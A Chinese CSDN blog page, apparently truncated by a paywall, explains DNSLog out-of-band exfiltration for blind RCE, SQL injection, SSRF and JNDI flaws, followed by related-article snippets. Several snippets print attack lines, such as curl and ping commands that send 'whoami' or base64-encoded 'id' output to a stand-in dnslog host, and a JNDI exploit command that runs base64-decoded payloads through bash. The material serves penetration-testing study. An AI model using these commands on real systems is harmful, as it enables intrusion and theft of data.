DNSLog漏洞

最新推荐文章于 2025-08-02 09:57:02 发布
最新推荐文章于 2025-08-02 09:57:02 发布
阅读量1k 收藏 5
点赞数 10
CC 4.0 BY-SA版权
分类专栏: dnsLog 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shirlly_/article/details/137890707

DNSLog漏洞

DNS(Domain Name System)是一个用于将域名转换为与之对应的 IP 地址的分布式命名系统。

DNS日志是记录特定设备或网络发出的所有DNS查询的记录。这些日志可用于排除DNS问题、监控网络活动和分析流量模式。DNS日志通常包括信息,如源IP地址、查询的域名、查询类型(如A记录、MX记录)以及从DNS服务器接收到的响应。

没有回显的情况下怎么办?

利用限制

1、域名层级:一般不超过5级
2、每级域名最大长度:63个ASCII字符
3、总域名长度:253个ASCII字符
4、内容限制:数字、字母、下划线
5、适用漏洞:RCE、XXE、SSRF、SQL注入、JNDI注入、反序列化等

http://dnslog.cn

利用DNSLog服务中的漏洞进行数据窃取攻击。攻击者可以通过在受害者系统上植入恶意代码,使其发送DNS请求到恶意控制的DNSLog服务器。当受害者系统发送DNS请求时,恶意控制的DNSLog服务器会记录请求中的敏感信息,如用户凭证、用户访问的网站等。攻击者可以通过分析DNSLog服务器上的日志来获取这些敏感信息,从而实现数据窃取。

DNS解析流程

用户在浏览器中输入一个域名,比如www.example.com。
操作系统首先检查本地的DNS缓存,看是否已经保存了这个域名对应的IP地址。如果有,就直接返回IP地址,跳过后续步骤。
如果本地缓存中没有找到对应的IP地址,操作系统会向本地的DNS解析器发起查询请求。
本地DNS解析器首先查询自己的缓存,看是否已经保存了这个域名对应的IP地址。如果有,就直接返回IP地址,跳过后续步骤。
如果本地DNS解析器的缓存中没有找到对应的IP地址,它会向根域名服务器发送查询请求。
根域名服务器收到查询请求后,会返回一个指向负责顶级域名(如.com、.net等)的服务器的IP地址。
本地DNS解析器收到根域名服务器返回的IP地址后,会向负责顶级域名的服务器发送查询请求。
负责顶级域名的服务器收到查询请求后,会返回一个指向负责
最低0.47元/天 解锁文章

200万优质内容无限畅学
35-3 使用dnslog探测fastjson漏洞
weixin_43263566的博客
04-10 876
DNSLog是一种记录在DNS上的域名相关信息的机制,类似于日志文件,记录了对域名或IP的访问信息。因特网采用树状结构的命名方法,按照组织结构划分域,每个域都是名字空间中被管理的一个划分,可以进一步划分为子域。当向DNS服务器发起kxsy.work的解析请求时,DNSLog会记录下此次解析,包括解析的域名和对应的IP地址。刷新dnslog服务器的记录,有记录就说明存在漏洞(一开始的4ax的子域名发送请求,刷新看不到,我就获取一个新的子域名做演示,所以下面的截图中的域名跟上一张不一样)将数据包发送到重发器。
log4j2漏洞复现
m0_59151303的博客
07-31 686
action= 这里有个参数可以传,可以按照上面的原理先构造一个请求传过去存在JNDI注入那么Idap服务端会执行我们传上去的payload然后在DNSLOG平台上那里留下记录,我们可以看到留下了访问记录并且前面的参数被执行后给我们回显了java的版本号!java -jar target/INDI-Injection-Exploit-1.0-SNAPSH0T-all.jar -C"bash -c{echo,[经过base64编码后的命令]}{base64,-d}|bash"-A 「你的ypsipl。
DNSLog漏洞探测(一)之DNSLog介绍
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-08 7559
DNSLog是一种基于DNS协议的信息收集技术,它可以用于网络安全领域的渗透测试、漏洞挖掘等方面。DNSLog的原理是利用DNS协议的特性,将需要收集的信息编码成DNS查询请求,然后将请求发送到DNS服务器,最后通过DNS服务器的响应来获取信息。DNSLog的实现方式有很多种,其中最常见的是使用第三方DNS服务。DNSLog的优点是隐蔽性高,缺点是响应时间较慢和存在一定的误报率。
DNSlog无回显渗透漏洞解析
最新发布
欢迎来到我的博客
08-02 995
DNSlog是一种利用DNS协议进行信息传递和漏洞探测的技术,在网络安全领域尤其适用于渗透测试和漏洞验证。其核心是将数据编码在DNS查询的域名中,通过目标系统向攻击者控制的DNS服务器发起查询,实现间接获取信息或确认漏洞。 公共平台如ceye.io和dnslog.cn简化了技术使用,但高级攻击可能结合分块传输、协议混淆(如DoH)提升隐蔽性。防御需结合输入过滤、DNS出口限制及日志监控。
SQL注入:从原理到实战,新手必防的“数据库漏洞杀手”(DNSLog注入篇)
2302_81945070的博客
06-15 484
DNSLog是一种的技术。通过让目标系统主动查询一个由攻击者控制的特殊域名,将漏洞触发结果(如命令执行结果、敏感数据)嵌入子域名,最终在DNS服务器日志中捕获回显信息。DNSLog 就是一个“回音壁”它让你生成一个专属的临时网址(比如 xxx.dnslog.cn),然后你诱骗目标系统去访问这个网址(比如执行 ping 你的网址),最后你在这个网址的后台查看访问记录,记录里就藏着目标系统泄露的信息(比如用户名、命令结果)!
dnslog:简约的 DNS 日志记录工具
05-31
dns日志 信息 简约的 DNS 日志记录工具。 捕获所有 DNS 流量并将其文本表示(以压缩形式)存储到/var/log/dnslog/<date>.log.gz 。 创建用于网络取证目的。 $ zcat /var/log/dnslog/2018-07-12.log.gz | head 00:00:00.001595 R A 192.168.107.168 192.168.110.233 ocsp.verisign.com 23.37.43.27 00:00:00.001949 Q PTR 192.168.107.146 199.253.182.182 2.6.e.f.a.b.e.f.f.f.6.5.0.5.2.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa ? 00:00:00.002314 R AAAA 37.48.122.173 194.5
DNSlog漏洞探测
2301_80661529的博客
03-16 2635
DNSlog 是一种 DNS 隧道技术,用于数据泄露或命令和控制(C2)通信。它利用 DNS 协议的特性,将数据编码为 DNS 查询或响应,从而实现数据通信。DNSlog 可用于检测子域取代、未授权区域传输和其他 DNS 相关漏洞。攻击者:攻击者将数据编码为 DNS 查询或响应,然后将其发送到 DNS 服务器。DNS 服务器:DNS 服务器会解析查询,并将响应发送回攻击者。攻击者:攻击者可以从 DNS 响应中提取数据,从而实现数据泄露或 C2 通信。
DNSLog漏洞探测(二)之常用DNSLog平台
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-10 6681
我们在上一篇文章中我们介绍了什么是DNSLog,如果我们自己要去搭建一个DNSLog的服务平台,还是比较复杂和麻烦的,所以我们可以直接去使用一些公开免费的DNSLog平台,DNSLog的平台非常的多,但是实际上大部分的DNSLog的平台都是昙花一现,真正意义上稳定持久的就只有那么几个,那么我们接下来给大家介绍几个常用且稳定的DNSLog平台吧。
DNSlog漏洞探测_服务器访问dnslog服务器是代表有漏洞
2401_84972870的博客
05-16 1019
DNSlog 是一种 DNS 隧道技术,用于数据泄露或命令和控制(C2)通信。它利用 DNS 协议的特性,将数据编码为 DNS 查询或响应,从而实现数据通信。DNSlog 可用于检测子域取代、未授权区域传输和其他 DNS 相关漏洞。攻击者:攻击者将数据编码为 DNS 查询或响应,然后将其发送到 DNS 服务器。DNS 服务器:DNS 服务器会解析查询,并将响应发送回攻击者。攻击者:攻击者可以从 DNS 响应中提取数据,从而实现数据泄露或 C2 通信。
DNSLog漏洞探测(七)之SQL注入漏洞实战
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-14 1051
在前面的文章之中,我们已经学习了XSS、RCE、XXE、SSRF漏洞中有关于DNSLog平台的使用。这些漏洞本身在执行时就有解析URL地址,发起网络请求的操作,所以只要我们把DNSLog平台获取的子域名地址发送到存在漏洞的服务器上,就会产生DNSLog的解析记录,这样就可以证明该漏洞的存在。
Java 中 DNS 反序列化漏洞的分析与复现
weixin_58666006的博客
08-21 1090
①外带的概念”外带“简单来说就是将数据信息隐蔽的带入或带出系统,该过程通长使用DNS请求或响应的字段来传递数据。②具体方式由于DNS查询本就可以携带一些额外的信息,因此攻击者可以利用这一特点来携带一些信息,如:通过查询子域名的方式,将恶意数据编码放入到子域名当中,然后将精心构造好的请求发送给目标DNS服务器,实现信息的传递由于响应也可携带如TXT类型的数据,攻击者可以将恶意的数据分段编码写入响应中,让目标系统提取这些数据,实现信息的传递。③具体应用。
FastJson远程命令执行漏洞学习笔记
m0_73257876的博客
09-04 786
fastjson的漏洞其实就是fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类中连接远程主机,通过其中的恶意类执行代码。笔记只做学习记录分享。如有错误,请大家批评指正!
创新蓝队-针对DNSlog数据外带攻击的应急与预防
Liyu_6618的博客
02-01 3362
创新蓝队-针对DNSlog数据外带攻击的应急与预防
Web漏洞知识梳理笔记--DNSlog数据外带
qq_47742555的博客
12-24 1605
DNSlog 数据外带技术利用了服务器发出的 DNS 请求来确认漏洞的存在和执行结果。通过利用 DNSlog 服务,攻击者可以有效检测 SSRF、盲注、RCE 等漏洞,并可能外带一些敏感数据。为了防范此类攻击,需要对外部请求进行严格限制,并加强对服务器网络访问的监控与防护。dnslog.cn。
WEB漏洞攻防 - SQL注入 - Dnslog注入
易编橙 · 终身成长社群,相遇已是上上签!
08-02 962
存在利用瓶颈,比较鸡肋。除了注入会用到,在其他场景也会用到,主要学习dns注入原理。 必须是Windows服务器、注入实现url访问、注入点必须是高权限且可执行写入。 原理:借助DNS解析产生日志的一个作用,来实现把一些数据反弹出来,类似反弹链接的作用。 应用场景:解决不回显(反向连接),SQL注入,命令执行,SSRF等
linux dns 攻击,DNSlog攻击技巧 | CN-SEC 中文网
weixin_35094408的博客
05-13 1366
摘要linux: curl http://xxx.dnslog.link/`whoami` ping -c 1 `whoami`.xxx.dnslog.link 如果碰到内容有空格(换行符等),就会截断,只输出前面的,这时候可以利用编码来输出,但有输出字符数最大限制; curl http://xxx.dnslog.link/$(id|base64) 碰到ls这类多个输出的命令,直接使用脚...
dnslog
shystartree的专栏
04-07 234
ssrf漏洞回连dnslog
01-15
### SSRF漏洞利用中的DNSLog回调方法 #### 使用DNSLog进行SSRF检测与验证 当存在SSRF漏洞时,攻击者可以通过构造特定的URL来触发服务器端发起HTTP请求。为了确认这些请求确实被发送并成功到达指定位置,通常会借助第三方服务如DNSLog来进行验证。 DNSLog的工作机制在于提供一个动态生成子域名的服务接口,每次访问都会记录下解析该域名的时间戳及相关信息。因此,在测试过程中只需要让目标应用尝试连接至`<random>.dnslog.cn`这样的特殊地址即可[^1]。 一旦应用程序内部发起了针对上述链接的网络活动,则会在对应的日志平台留下痕迹;这不仅证明了可能存在未授权的数据流出风险,同时也帮助定位具体受影响的功能模块。 #### 实际操作流程展示 假设有一个易受攻击的应用程序允许用户输入网址用于获取远程资源: ```python import requests def fetch_data(url): response = requests.get(url) return response.text ``` 此时如果能够控制参数`url`的内容,就可以精心设计成如下形式传递给函数处理: - `http://example.dnslog.cn/` 由于fetch_data()方法里并没有严格校验传入路径的有效性和合法性,所以它将会按照指示去接触外部站点,并最终使得这次交互行为反映在关联的日志系统之中[^3]。 需要注意的是实际渗透测试活动中应当遵循合法合规的原则开展工作,严禁非法入侵他人信息系统的行为发生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值